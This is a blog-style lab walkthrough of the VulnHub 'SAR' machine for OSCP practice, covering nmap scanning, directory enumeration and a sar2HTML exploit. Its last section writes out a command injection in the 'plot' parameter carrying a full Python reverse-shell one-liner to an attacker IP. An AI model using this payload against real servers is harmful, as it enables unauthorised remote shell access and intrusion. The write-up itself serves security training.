Machines I Solved for OSCP (SAR)

3 min readAug 16, 2024

Hello People, I recently passed my OSCP certification. As part of my journey, I solved some Windows and Linux machines on Hack The Box, Offsec PG Labs. I’m going to write this series of blogs about machines I practiced throughout my OSCP journey. I’m not assuming you are a beginner so I’m not explaining every command here. I’m just trying to explain my methodology of approaching to the machines

SAR

https://www.vulnhub.com/entry/sar-1,425/

Nmap Scan: For Nmap, my methodology is: I will use the following commands

nmap -v <IP>
nmap -p- <IP>
nmap -p openports <IP> -sV -sC -T4

nmap 192.168.183.35 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 14:36 EDT
Nmap scan report for 192.168.183.35
Host is up (0.038s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 27.47 seconds

Through the nmap scan, I found port 22, 80 Open.

Dirbuster (dirb, feroxbuster, gobuster, dirsearch)

I usually start with the basic tool dirb with default wordlist, then I use feroxbuster with a medium wordlist. Most of the time, I get hits from the medium wordlist. Let’s start with dirb.

Then, what is sar2HTML?

The exploit

Visit http://192.168.183.35/sar2HTML/index.php?plot=id send that to burp then send it to repeater.

Add a semicolon to before passing the command. Then you see the output.

192.168.192.35/sar2HTML/index.php?plot=;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.243",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Press enter or click to view image in full size